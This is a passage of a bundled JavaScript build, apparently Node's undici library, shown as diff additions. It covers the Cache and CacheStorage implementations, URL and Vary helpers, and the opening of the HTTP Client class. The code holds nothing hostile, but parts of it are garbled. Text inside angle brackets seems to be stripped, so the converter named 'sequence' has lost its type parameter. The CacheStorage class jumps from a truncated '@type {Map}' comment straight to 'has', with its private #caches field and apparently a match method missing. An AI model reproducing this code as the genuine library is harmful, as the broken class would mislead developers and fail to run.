CacheBatchOperation + * @property {'delete' | 'put'} type + * @property {any} request + * @property {any} response + * @property {import('../../types/cache').CacheQueryOptions} options + */ + +/** + * @see https://w3c.github.io/ServiceWorker/#dfn-request-response-list + * @typedef {[any, any][]} requestResponseList + */ + +class Cache { + /** + * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-request-response-list + * @type {requestResponseList} + */ + #relevantRequestResponseList + + constructor () { + if 
(arguments[0] !== kConstruct) { + webidl.illegalConstructor() + } + + this.#relevantRequestResponseList = arguments[1] + } + + async match (request, options = {}) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.match' }) + + request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + const p = await this.matchAll(request, options) + + if (p.length === 0) { + return + } + + return p[0] + } + + async matchAll (request = undefined, options = {}) { + webidl.brandCheck(this, Cache) + + if (request !== undefined) request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + // 1. + let r = null + + // 2. + if (request !== undefined) { + if (request instanceof Request) { + // 2.1.1 + r = request[kState] + + // 2.1.2 + if (r.method !== 'GET' && !options.ignoreMethod) { + return [] + } + } else if (typeof request === 'string') { + // 2.2.1 + r = new Request(request)[kState] + } + } + + // 5. + // 5.1 + const responses = [] + + // 5.2 + if (request === undefined) { + // 5.2.1 + for (const requestResponse of this.#relevantRequestResponseList) { + responses.push(requestResponse[1]) + } + } else { // 5.3 + // 5.3.1 + const requestResponses = this.#queryCache(r, options) + + // 5.3.2 + for (const requestResponse of requestResponses) { + responses.push(requestResponse[1]) + } + } + + // 5.4 + // We don't implement CORs so we don't need to loop over the responses, yay! + + // 5.5.1 + const responseList = [] + + // 5.5.2 + for (const response of responses) { + // 5.5.2.1 + const responseObject = new Response(response.body?.source ?? null) + const body = responseObject[kState].body + responseObject[kState] = response + responseObject[kState].body = body + responseObject[kHeaders][kHeadersList] = response.headersList + responseObject[kHeaders][kGuard] = 'immutable' + + responseList.push(responseObject) + } + + // 6. 
+ return Object.freeze(responseList) + } + + async add (request) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.add' }) + + request = webidl.converters.RequestInfo(request) + + // 1. + const requests = [request] + + // 2. + const responseArrayPromise = this.addAll(requests) + + // 3. + return await responseArrayPromise + } + + async addAll (requests) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.addAll' }) + + requests = webidl.converters['sequence'](requests) + + // 1. + const responsePromises = [] + + // 2. + const requestList = [] + + // 3. + for (const request of requests) { + if (typeof request === 'string') { + continue + } + + // 3.1 + const r = request[kState] + + // 3.2 + if (!urlIsHttpHttpsScheme(r.url) || r.method !== 'GET') { + throw webidl.errors.exception({ + header: 'Cache.addAll', + message: 'Expected http/s scheme when method is not GET.' + }) + } + } + + // 4. + /** @type {ReturnType[]} */ + const fetchControllers = [] + + // 5. + for (const request of requests) { + // 5.1 + const r = new Request(request)[kState] + + // 5.2 + if (!urlIsHttpHttpsScheme(r.url)) { + throw webidl.errors.exception({ + header: 'Cache.addAll', + message: 'Expected http/s scheme.' + }) + } + + // 5.4 + r.initiator = 'fetch' + r.destination = 'subresource' + + // 5.5 + requestList.push(r) + + // 5.6 + const responsePromise = createDeferredPromise() + + // 5.7 + fetchControllers.push(fetching({ + request: r, + dispatcher: getGlobalDispatcher(), + processResponse (response) { + // 1. + if (response.type === 'error' || response.status === 206 || response.status < 200 || response.status > 299) { + responsePromise.reject(webidl.errors.exception({ + header: 'Cache.addAll', + message: 'Received an invalid status code or the request failed.' + })) + } else if (response.headersList.contains('vary')) { // 2. 
+ // 2.1 + const fieldValues = getFieldValues(response.headersList.get('vary')) + + // 2.2 + for (const fieldValue of fieldValues) { + // 2.2.1 + if (fieldValue === '*') { + responsePromise.reject(webidl.errors.exception({ + header: 'Cache.addAll', + message: 'invalid vary field value' + })) + + for (const controller of fetchControllers) { + controller.abort() + } + + return + } + } + } + }, + processResponseEndOfBody (response) { + // 1. + if (response.aborted) { + responsePromise.reject(new DOMException('aborted', 'AbortError')) + return + } + + // 2. + responsePromise.resolve(response) + } + })) + + // 5.8 + responsePromises.push(responsePromise.promise) + } + + // 6. + const p = Promise.all(responsePromises) + + // 7. + const responses = await p + + // 7.1 + const operations = [] + + // 7.2 + let index = 0 + + // 7.3 + for (const response of responses) { + // 7.3.1 + /** @type {CacheBatchOperation} */ + const operation = { + type: 'put', // 7.3.2 + request: requestList[index], // 7.3.3 + response // 7.3.4 + } + + operations.push(operation) // 7.3.5 + + index++ // 7.3.6 + } + + // 7.5 + const cacheJobPromise = createDeferredPromise() + + // 7.6.1 + let errorData = null + + // 7.6.2 + try { + this.#batchCacheOperations(operations) + } catch (e) { + errorData = e + } + + // 7.6.3 + queueMicrotask(() => { + // 7.6.3.1 + if (errorData === null) { + cacheJobPromise.resolve(undefined) + } else { + // 7.6.3.2 + cacheJobPromise.reject(errorData) + } + }) + + // 7.7 + return cacheJobPromise.promise + } + + async put (request, response) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 2, { header: 'Cache.put' }) + + request = webidl.converters.RequestInfo(request) + response = webidl.converters.Response(response) + + // 1. + let innerRequest = null + + // 2. + if (request instanceof Request) { + innerRequest = request[kState] + } else { // 3. + innerRequest = new Request(request)[kState] + } + + // 4. 
+ if (!urlIsHttpHttpsScheme(innerRequest.url) || innerRequest.method !== 'GET') { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Expected an http/s scheme when method is not GET' + }) + } + + // 5. + const innerResponse = response[kState] + + // 6. + if (innerResponse.status === 206) { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Got 206 status' + }) + } + + // 7. + if (innerResponse.headersList.contains('vary')) { + // 7.1. + const fieldValues = getFieldValues(innerResponse.headersList.get('vary')) + + // 7.2. + for (const fieldValue of fieldValues) { + // 7.2.1 + if (fieldValue === '*') { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Got * vary field value' + }) + } + } + } + + // 8. + if (innerResponse.body && (isDisturbed(innerResponse.body.stream) || innerResponse.body.stream.locked)) { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Response body is locked or disturbed' + }) + } + + // 9. + const clonedResponse = cloneResponse(innerResponse) + + // 10. + const bodyReadPromise = createDeferredPromise() + + // 11. + if (innerResponse.body != null) { + // 11.1 + const stream = innerResponse.body.stream + + // 11.2 + const reader = stream.getReader() + + // 11.3 + readAllBytes(reader).then(bodyReadPromise.resolve, bodyReadPromise.reject) + } else { + bodyReadPromise.resolve(undefined) + } + + // 12. + /** @type {CacheBatchOperation[]} */ + const operations = [] + + // 13. + /** @type {CacheBatchOperation} */ + const operation = { + type: 'put', // 14. + request: innerRequest, // 15. + response: clonedResponse // 16. + } + + // 17. + operations.push(operation) + + // 19. 
+ const bytes = await bodyReadPromise.promise + + if (clonedResponse.body != null) { + clonedResponse.body.source = bytes + } + + // 19.1 + const cacheJobPromise = createDeferredPromise() + + // 19.2.1 + let errorData = null + + // 19.2.2 + try { + this.#batchCacheOperations(operations) + } catch (e) { + errorData = e + } + + // 19.2.3 + queueMicrotask(() => { + // 19.2.3.1 + if (errorData === null) { + cacheJobPromise.resolve() + } else { // 19.2.3.2 + cacheJobPromise.reject(errorData) + } + }) + + return cacheJobPromise.promise + } + + async delete (request, options = {}) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.delete' }) + + request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + /** + * @type {Request} + */ + let r = null + + if (request instanceof Request) { + r = request[kState] + + if (r.method !== 'GET' && !options.ignoreMethod) { + return false + } + } else { + assert(typeof request === 'string') + + r = new Request(request)[kState] + } + + /** @type {CacheBatchOperation[]} */ + const operations = [] + + /** @type {CacheBatchOperation} */ + const operation = { + type: 'delete', + request: r, + options + } + + operations.push(operation) + + const cacheJobPromise = createDeferredPromise() + + let errorData = null + let requestResponses + + try { + requestResponses = this.#batchCacheOperations(operations) + } catch (e) { + errorData = e + } + + queueMicrotask(() => { + if (errorData === null) { + cacheJobPromise.resolve(!!requestResponses?.length) + } else { + cacheJobPromise.reject(errorData) + } + }) + + return cacheJobPromise.promise + } + + /** + * @see https://w3c.github.io/ServiceWorker/#dom-cache-keys + * @param {any} request + * @param {import('../../types/cache').CacheQueryOptions} options + * @returns {readonly Request[]} + */ + async keys (request = undefined, options = {}) { + webidl.brandCheck(this, Cache) + + if (request !== undefined) 
request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + // 1. + let r = null + + // 2. + if (request !== undefined) { + // 2.1 + if (request instanceof Request) { + // 2.1.1 + r = request[kState] + + // 2.1.2 + if (r.method !== 'GET' && !options.ignoreMethod) { + return [] + } + } else if (typeof request === 'string') { // 2.2 + r = new Request(request)[kState] + } + } + + // 4. + const promise = createDeferredPromise() + + // 5. + // 5.1 + const requests = [] + + // 5.2 + if (request === undefined) { + // 5.2.1 + for (const requestResponse of this.#relevantRequestResponseList) { + // 5.2.1.1 + requests.push(requestResponse[0]) + } + } else { // 5.3 + // 5.3.1 + const requestResponses = this.#queryCache(r, options) + + // 5.3.2 + for (const requestResponse of requestResponses) { + // 5.3.2.1 + requests.push(requestResponse[0]) + } + } + + // 5.4 + queueMicrotask(() => { + // 5.4.1 + const requestList = [] + + // 5.4.2 + for (const request of requests) { + const requestObject = new Request('https://a') + requestObject[kState] = request + requestObject[kHeaders][kHeadersList] = request.headersList + requestObject[kHeaders][kGuard] = 'immutable' + requestObject[kRealm] = request.client + + // 5.4.2.1 + requestList.push(requestObject) + } + + // 5.4.3 + promise.resolve(Object.freeze(requestList)) + }) + + return promise.promise + } + + /** + * @see https://w3c.github.io/ServiceWorker/#batch-cache-operations-algorithm + * @param {CacheBatchOperation[]} operations + * @returns {requestResponseList} + */ + #batchCacheOperations (operations) { + // 1. + const cache = this.#relevantRequestResponseList + + // 2. + const backupCache = [...cache] + + // 3. 
+ const addedItems = [] + + // 4.1 + const resultList = [] + + try { + // 4.2 + for (const operation of operations) { + // 4.2.1 + if (operation.type !== 'delete' && operation.type !== 'put') { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'operation type does not match "delete" or "put"' + }) + } + + // 4.2.2 + if (operation.type === 'delete' && operation.response != null) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'delete operation should not have an associated response' + }) + } + + // 4.2.3 + if (this.#queryCache(operation.request, operation.options, addedItems).length) { + throw new DOMException('???', 'InvalidStateError') + } + + // 4.2.4 + let requestResponses + + // 4.2.5 + if (operation.type === 'delete') { + // 4.2.5.1 + requestResponses = this.#queryCache(operation.request, operation.options) + + // TODO: the spec is wrong, this is needed to pass WPTs + if (requestResponses.length === 0) { + return [] + } + + // 4.2.5.2 + for (const requestResponse of requestResponses) { + const idx = cache.indexOf(requestResponse) + assert(idx !== -1) + + // 4.2.5.2.1 + cache.splice(idx, 1) + } + } else if (operation.type === 'put') { // 4.2.6 + // 4.2.6.1 + if (operation.response == null) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'put operation should have an associated response' + }) + } + + // 4.2.6.2 + const r = operation.request + + // 4.2.6.3 + if (!urlIsHttpHttpsScheme(r.url)) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'expected http or https scheme' + }) + } + + // 4.2.6.4 + if (r.method !== 'GET') { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'not get method' + }) + } + + // 4.2.6.5 + if (operation.options != null) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'options must not be defined' + }) + } + + // 
4.2.6.6 + requestResponses = this.#queryCache(operation.request) + + // 4.2.6.7 + for (const requestResponse of requestResponses) { + const idx = cache.indexOf(requestResponse) + assert(idx !== -1) + + // 4.2.6.7.1 + cache.splice(idx, 1) + } + + // 4.2.6.8 + cache.push([operation.request, operation.response]) + + // 4.2.6.10 + addedItems.push([operation.request, operation.response]) + } + + // 4.2.7 + resultList.push([operation.request, operation.response]) + } + + // 4.3 + return resultList + } catch (e) { // 5. + // 5.1 + this.#relevantRequestResponseList.length = 0 + + // 5.2 + this.#relevantRequestResponseList = backupCache + + // 5.3 + throw e + } + } + + /** + * @see https://w3c.github.io/ServiceWorker/#query-cache + * @param {any} requestQuery + * @param {import('../../types/cache').CacheQueryOptions} options + * @param {requestResponseList} targetStorage + * @returns {requestResponseList} + */ + #queryCache (requestQuery, options, targetStorage) { + /** @type {requestResponseList} */ + const resultList = [] + + const storage = targetStorage ?? 
this.#relevantRequestResponseList + + for (const requestResponse of storage) { + const [cachedRequest, cachedResponse] = requestResponse + if (this.#requestMatchesCachedItem(requestQuery, cachedRequest, cachedResponse, options)) { + resultList.push(requestResponse) + } + } + + return resultList + } + + /** + * @see https://w3c.github.io/ServiceWorker/#request-matches-cached-item-algorithm + * @param {any} requestQuery + * @param {any} request + * @param {any | null} response + * @param {import('../../types/cache').CacheQueryOptions | undefined} options + * @returns {boolean} + */ + #requestMatchesCachedItem (requestQuery, request, response = null, options) { + // if (options?.ignoreMethod === false && request.method === 'GET') { + // return false + // } + + const queryURL = new URL(requestQuery.url) + + const cachedURL = new URL(request.url) + + if (options?.ignoreSearch) { + cachedURL.search = '' + + queryURL.search = '' + } + + if (!urlEquals(queryURL, cachedURL, true)) { + return false + } + + if ( + response == null || + options?.ignoreVary || + !response.headersList.contains('vary') + ) { + return true + } + + const fieldValues = getFieldValues(response.headersList.get('vary')) + + for (const fieldValue of fieldValues) { + if (fieldValue === '*') { + return false + } + + const requestValue = request.headersList.get(fieldValue) + const queryValue = requestQuery.headersList.get(fieldValue) + + // If one has the header and the other doesn't, or one has + // a different value than the other, return false + if (requestValue !== queryValue) { + return false + } + } + + return true + } +} + +Object.defineProperties(Cache.prototype, { + [Symbol.toStringTag]: { + value: 'Cache', + configurable: true + }, + match: kEnumerableProperty, + matchAll: kEnumerableProperty, + add: kEnumerableProperty, + addAll: kEnumerableProperty, + put: kEnumerableProperty, + delete: kEnumerableProperty, + keys: kEnumerableProperty +}) + +const cacheQueryOptionConverters = [ + { + key: 
'ignoreSearch', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'ignoreMethod', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'ignoreVary', + converter: webidl.converters.boolean, + defaultValue: false + } +] + +webidl.converters.CacheQueryOptions = webidl.dictionaryConverter(cacheQueryOptionConverters) + +webidl.converters.MultiCacheQueryOptions = webidl.dictionaryConverter([ + ...cacheQueryOptionConverters, + { + key: 'cacheName', + converter: webidl.converters.DOMString + } +]) + +webidl.converters.Response = webidl.interfaceConverter(Response) + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.RequestInfo +) + +module.exports = { + Cache +} + + +/***/ }), + +/***/ 7907: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kConstruct } = __nccwpck_require__(9174) +const { Cache } = __nccwpck_require__(6101) +const { webidl } = __nccwpck_require__(1744) +const { kEnumerableProperty } = __nccwpck_require__(3983) + +class CacheStorage { + /** + * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-name-to-cache-map + * @type {Map} + */ + async has (cacheName) { + webidl.brandCheck(this, CacheStorage) + webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.has' }) + + cacheName = webidl.converters.DOMString(cacheName) + + // 2.1.1 + // 2.2 + return this.#caches.has(cacheName) + } + + /** + * @see https://w3c.github.io/ServiceWorker/#dom-cachestorage-open + * @param {string} cacheName + * @returns {Promise} + */ + async open (cacheName) { + webidl.brandCheck(this, CacheStorage) + webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.open' }) + + cacheName = webidl.converters.DOMString(cacheName) + + // 2.1 + if (this.#caches.has(cacheName)) { + // await caches.open('v1') !== await caches.open('v1') + + // 2.1.1 + const cache = this.#caches.get(cacheName) + + // 2.1.1.1 + return new Cache(kConstruct, cache) 
+ } + + // 2.2 + const cache = [] + + // 2.3 + this.#caches.set(cacheName, cache) + + // 2.4 + return new Cache(kConstruct, cache) + } + + /** + * @see https://w3c.github.io/ServiceWorker/#cache-storage-delete + * @param {string} cacheName + * @returns {Promise} + */ + async delete (cacheName) { + webidl.brandCheck(this, CacheStorage) + webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.delete' }) + + cacheName = webidl.converters.DOMString(cacheName) + + return this.#caches.delete(cacheName) + } + + /** + * @see https://w3c.github.io/ServiceWorker/#cache-storage-keys + * @returns {string[]} + */ + async keys () { + webidl.brandCheck(this, CacheStorage) + + // 2.1 + const keys = this.#caches.keys() + + // 2.2 + return [...keys] + } +} + +Object.defineProperties(CacheStorage.prototype, { + [Symbol.toStringTag]: { + value: 'CacheStorage', + configurable: true + }, + match: kEnumerableProperty, + has: kEnumerableProperty, + open: kEnumerableProperty, + delete: kEnumerableProperty, + keys: kEnumerableProperty +}) + +module.exports = { + CacheStorage +} + + +/***/ }), + +/***/ 9174: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +module.exports = { + kConstruct: (__nccwpck_require__(2785).kConstruct) +} + + +/***/ }), + +/***/ 2396: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const assert = __nccwpck_require__(9491) +const { URLSerializer } = __nccwpck_require__(685) +const { isValidHeaderName } = __nccwpck_require__(2538) + +/** + * @see https://url.spec.whatwg.org/#concept-url-equals + * @param {URL} A + * @param {URL} B + * @param {boolean | undefined} excludeFragment + * @returns {boolean} + */ +function urlEquals (A, B, excludeFragment = false) { + const serializedA = URLSerializer(A, excludeFragment) + + const serializedB = URLSerializer(B, excludeFragment) + + return serializedA === serializedB +} + +/** + * @see 
https://github.com/chromium/chromium/blob/694d20d134cb553d8d89e5500b9148012b1ba299/content/browser/cache_storage/cache_storage_cache.cc#L260-L262 + * @param {string} header + */ +function fieldValues (header) { + assert(header !== null) + + const values = [] + + for (let value of header.split(',')) { + value = value.trim() + + if (!value.length) { + continue + } else if (!isValidHeaderName(value)) { + continue + } + + values.push(value) + } + + return values +} + +module.exports = { + urlEquals, + fieldValues +} + + +/***/ }), + +/***/ 3598: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +// @ts-check + + + +/* global WebAssembly */ + +const assert = __nccwpck_require__(9491) +const net = __nccwpck_require__(1808) +const http = __nccwpck_require__(3685) +const { pipeline } = __nccwpck_require__(2781) +const util = __nccwpck_require__(3983) +const timers = __nccwpck_require__(9459) +const Request = __nccwpck_require__(2905) +const DispatcherBase = __nccwpck_require__(4839) +const { + RequestContentLengthMismatchError, + ResponseContentLengthMismatchError, + InvalidArgumentError, + RequestAbortedError, + HeadersTimeoutError, + HeadersOverflowError, + SocketError, + InformationalError, + BodyTimeoutError, + HTTPParserError, + ResponseExceededMaxSizeError, + ClientDestroyedError +} = __nccwpck_require__(8045) +const buildConnector = __nccwpck_require__(2067) +const { + kUrl, + kReset, + kServerName, + kClient, + kBusy, + kParser, + kConnect, + kBlocking, + kResuming, + kRunning, + kPending, + kSize, + kWriting, + kQueue, + kConnected, + kConnecting, + kNeedDrain, + kNoRef, + kKeepAliveDefaultTimeout, + kHostHeader, + kPendingIdx, + kRunningIdx, + kError, + kPipelining, + kSocket, + kKeepAliveTimeoutValue, + kMaxHeadersSize, + kKeepAliveMaxTimeout, + kKeepAliveTimeoutThreshold, + kHeadersTimeout, + kBodyTimeout, + kStrictContentLength, + kConnector, + kMaxRedirections, + kMaxRequests, + kCounter, + kClose, + kDestroy, + kDispatch, 
+ kInterceptors, + kLocalAddress, + kMaxResponseSize, + kHTTPConnVersion, + // HTTP2 + kHost, + kHTTP2Session, + kHTTP2SessionState, + kHTTP2BuildRequest, + kHTTP2CopyHeaders, + kHTTP1BuildRequest +} = __nccwpck_require__(2785) + +/** @type {import('http2')} */ +let http2 +try { + http2 = __nccwpck_require__(5158) +} catch { + // @ts-ignore + http2 = { constants: {} } +} + +const { + constants: { + HTTP2_HEADER_AUTHORITY, + HTTP2_HEADER_METHOD, + HTTP2_HEADER_PATH, + HTTP2_HEADER_SCHEME, + HTTP2_HEADER_CONTENT_LENGTH, + HTTP2_HEADER_EXPECT, + HTTP2_HEADER_STATUS + } +} = http2 + +// Experimental +let h2ExperimentalWarned = false + +const FastBuffer = Buffer[Symbol.species] + +const kClosedResolve = Symbol('kClosedResolve') + +const channels = {} + +try { + const diagnosticsChannel = __nccwpck_require__(7643) + channels.sendHeaders = diagnosticsChannel.channel('undici:client:sendHeaders') + channels.beforeConnect = diagnosticsChannel.channel('undici:client:beforeConnect') + channels.connectError = diagnosticsChannel.channel('undici:client:connectError') + channels.connected = diagnosticsChannel.channel('undici:client:connected') +} catch { + channels.sendHeaders = { hasSubscribers: false } + channels.beforeConnect = { hasSubscribers: false } + channels.connectError = { hasSubscribers: false } + channels.connected = { hasSubscribers: false } +} + +/** + * @type {import('../types/client').default} + */ +class Client extends DispatcherBase { + /** + * + * @param {string|URL} url + * @param {import('../types/client').Client.Options} options + */ + constructor (url, { + interceptors, + maxHeaderSize, + headersTimeout, + socketTimeout, + requestTimeout, + connectTimeout, + bodyTimeout, + idleTimeout, + keepAlive, + keepAliveTimeout, + maxKeepAliveTimeout, + keepAliveMaxTimeout, + keepAliveTimeoutThreshold, + socketPath, + pipelining, + tls, + strictContentLength, + maxCachedSessions, + maxRedirections, + connect, + maxRequestsPerClient, + localAddress, + maxResponseSize, 
+ autoSelectFamily, + autoSelectFamilyAttemptTimeout, + // h2 + allowH2, + maxConcurrentStreams + } = {}) { + super() + + if (keepAlive !== undefined) { + throw new InvalidArgumentError('unsupported keepAlive, use pipelining=0 instead') + } + + if (socketTimeout !== undefined) { + throw new InvalidArgumentError('unsupported socketTimeout, use headersTimeout & bodyTimeout instead') + } + + if (requestTimeout !== undefined) { + throw new InvalidArgumentError('unsupported requestTimeout, use headersTimeout & bodyTimeout instead') + } + + if (idleTimeout !== undefined) { + throw new InvalidArgumentError('unsupported idleTimeout, use keepAliveTimeout instead') + } + + if (maxKeepAliveTimeout !== undefined) { + throw new InvalidArgumentError('unsupported maxKeepAliveTimeout, use keepAliveMaxTimeout instead') + } + + if (maxHeaderSize != null && !Number.isFinite(maxHeaderSize)) { + throw new InvalidArgumentError('invalid maxHeaderSize') + } + + if (socketPath != null && typeof socketPath !== 'string') { + throw new InvalidArgumentError('invalid socketPath') + } + + if (connectTimeout != null && (!Number.isFinite(connectTimeout) || connectTimeout < 0)) { + throw new InvalidArgumentError('invalid connectTimeout') + } + + if (keepAliveTimeout != null && (!Number.isFinite(keepAliveTimeout) || keepAliveTimeout <= 0)) { + throw new InvalidArgumentError('invalid keepAliveTimeout') + } + + if (keepAliveMaxTimeout != null && (!Number.isFinite(keepAliveMaxTimeout) || keepAliveMaxTimeout <= 0)) { + throw new InvalidArgumentError('invalid keepAliveMaxTimeout') + } + + if (keepAliveTimeoutThreshold != null && !Number.isFinite(keepAliveTimeoutThreshold)) { + throw new InvalidArgumentError('invalid keepAliveTimeoutThreshold') + } + + if (headersTimeout != null && (!Number.isInteger(headersTimeout) || headersTimeout < 0)) { + throw new InvalidArgumentError('headersTimeout must be a positive integer or zero') + } + + if (bodyTimeout != null && (!Number.isInteger(bodyTimeout) || 
bodyTimeout < 0)) { + throw new InvalidArgumentError('bodyTimeout must be a positive integer or zero') + } + + if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { + throw new InvalidArgumentError('connect must be a function or an object') + } + + if (maxRedirections != null && (!Number.isInteger(maxRedirections) || maxRedirections < 0)) { + throw new InvalidArgumentError('maxRedirections must be a positive number') + } + + if (maxRequestsPerClient != null && (!Number.isInteger(maxRequestsPerClient) || maxRequestsPerClient < 0)) { + throw new InvalidArgumentError('maxRequestsPerClient must be a positive number') + } + + if (localAddress != null && (typeof localAddress !== 'string' || net.isIP(localAddress) === 0)) { + throw new InvalidArgumentError('localAddress must be valid string IP address') + } + + if (maxResponseSize != null && (!Number.isInteger(maxResponseSize) || maxResponseSize < -1)) { + throw new InvalidArgumentError('maxResponseSize must be a positive number') + } + + if ( + autoSelectFamilyAttemptTimeout != null && + (!Number.isInteger(autoSelectFamilyAttemptTimeout) || autoSelectFamilyAttemptTimeout < -1) + ) { + throw new InvalidArgumentError('autoSelectFamilyAttemptTimeout must be a positive number') + } + + // h2 + if (allowH2 != null && typeof allowH2 !== 'boolean') { + throw new InvalidArgumentError('allowH2 must be a valid boolean value') + } + + if (maxConcurrentStreams != null && (typeof maxConcurrentStreams !== 'number' || maxConcurrentStreams < 1)) { + throw new InvalidArgumentError('maxConcurrentStreams must be a possitive integer, greater than 0') + } + + if (typeof connect !== 'function') { + connect = buildConnector({ + ...tls, + maxCachedSessions, + allowH2, + socketPath, + timeout: connectTimeout, + ...(util.nodeHasAutoSelectFamily && autoSelectFamily ? 
{ autoSelectFamily, autoSelectFamilyAttemptTimeout } : undefined), + ...connect + }) + } + + this[kInterceptors] = interceptors && interceptors.Client && Array.isArray(interceptors.Client) + ? interceptors.Client + : [createRedirectInterceptor({ maxRedirections })] + this[kUrl] = util.parseOrigin(url) + this[kConnector] = connect + this[kSocket] = null + this[kPipelining] = pipelining != null ? pipelining : 1 + this[kMaxHeadersSize] = maxHeaderSize || http.maxHeaderSize + this[kKeepAliveDefaultTimeout] = keepAliveTimeout == null ? 4e3 : keepAliveTimeout + this[kKeepAliveMaxTimeout] = keepAliveMaxTimeout == null ? 600e3 : keepAliveMaxTimeout + this[kKeepAliveTimeoutThreshold] = keepAliveTimeoutThreshold == null ? 1e3 : keepAliveTimeoutThreshold + this[kKeepAliveTimeoutValue] = this[kKeepAliveDefaultTimeout] + this[kServerName] = null + this[kLocalAddress] = localAddress != null ? localAddress : null + this[kResuming] = 0 // 0, idle, 1, scheduled, 2 resuming + this[kNeedDrain] = 0 // 0, idle, 1, scheduled, 2 resuming + this[kHostHeader] = `host: ${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}\r\n` + this[kBodyTimeout] = bodyTimeout != null ? bodyTimeout : 300e3 + this[kHeadersTimeout] = headersTimeout != null ? headersTimeout : 300e3 + this[kStrictContentLength] = strictContentLength == null ? true : strictContentLength + this[kMaxRedirections] = maxRedirections + this[kMaxRequests] = maxRequestsPerClient + this[kClosedResolve] = null + this[kMaxResponseSize] = maxResponseSize > -1 ? maxResponseSize : -1 + this[kHTTPConnVersion] = 'h1' + + // HTTP/2 + this[kHTTP2Session] = null + this[kHTTP2SessionState] = !allowH2 + ? null + : { + // streams: null, // Fixed queue of streams - For future support of `push` + openStreams: 0, // Keep track of them to decide wether or not unref the session + maxConcurrentStreams: maxConcurrentStreams != null ? 
maxConcurrentStreams : 100 // Max peerConcurrentStreams for a Node h2 server + } + this[kHost] = `${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}` + + // kQueue is built up of 3 sections separated by + // the kRunningIdx and kPendingIdx indices. + // | complete | running | pending | + // ^ kRunningIdx ^ kPendingIdx ^ kQueue.length + // kRunningIdx points to the first running element. + // kPendingIdx points to the first pending element. + // This implements a fast queue with an amortized + // time of O(1). + + this[kQueue] = [] + this[kRunningIdx] = 0 + this[kPendingIdx] = 0 + } + + get pipelining () { + return this[kPipelining] + } + + set pipelining (value) { + this[kPipelining] = value + resume(this, true) + } + + get [kPending] () { + return this[kQueue].length - this[kPendingIdx] + } + + get [kRunning] () { + return this[kPendingIdx] - this[kRunningIdx] + } + + get [kSize] () { + return this[kQueue].length - this[kRunningIdx] + } + + get [kConnected] () { + return !!this[kSocket] && !this[kConnecting] && !this[kSocket].destroyed + } + + get [kBusy] () { + const socket = this[kSocket] + return ( + (socket && (socket[kReset] || socket[kWriting] || socket[kBlocking])) || + (this[kSize] >= (this[kPipelining] || 1)) || + this[kPending] > 0 + ) + } + + /* istanbul ignore: only used for test */ + [kConnect] (cb) { + connect(this) + this.once('connect', cb) + } + + [kDispatch] (opts, handler) { + const origin = opts.origin || this[kUrl].origin + + const request = this[kHTTPConnVersion] === 'h2' + ? Request[kHTTP2BuildRequest](origin, opts, handler) + : Request[kHTTP1BuildRequest](origin, opts, handler) + + this[kQueue].push(request) + if (this[kResuming]) { + // Do nothing. + } else if (util.bodyLength(request.body) == null && util.isIterable(request.body)) { + // Wait a tick in case stream/iterator is ended in the same tick. 
+ this[kResuming] = 1 + process.nextTick(resume, this) + } else { + resume(this, true) + } + + if (this[kResuming] && this[kNeedDrain] !== 2 && this[kBusy]) { + this[kNeedDrain] = 2 + } + + return this[kNeedDrain] < 2 + } + + async [kClose] () { + // TODO: for H2 we need to gracefully flush the remaining enqueued + // request and close each stream. + return new Promise((resolve) => { + if (!this[kSize]) { + resolve(null) + } else { + this[kClosedResolve] = resolve + } + }) + } + + async [kDestroy] (err) { + return new Promise((resolve) => { + const requests = this[kQueue].splice(this[kPendingIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(this, request, err) + } + + const callback = () => { + if (this[kClosedResolve]) { + // TODO (fix): Should we error here with ClientDestroyedError? + this[kClosedResolve]() + this[kClosedResolve] = null + } + resolve() + } + + if (this[kHTTP2Session] != null) { + util.destroy(this[kHTTP2Session], err) + this[kHTTP2Session] = null + this[kHTTP2SessionState] = null + } + + if (!this[kSocket]) { + queueMicrotask(callback) + } else { + util.destroy(this[kSocket].on('close', callback), err) + } + + resume(this) + }) + } +} + +function onHttp2SessionError (err) { + assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') + + this[kSocket][kError] = err + + onError(this[kClient], err) +} + +function 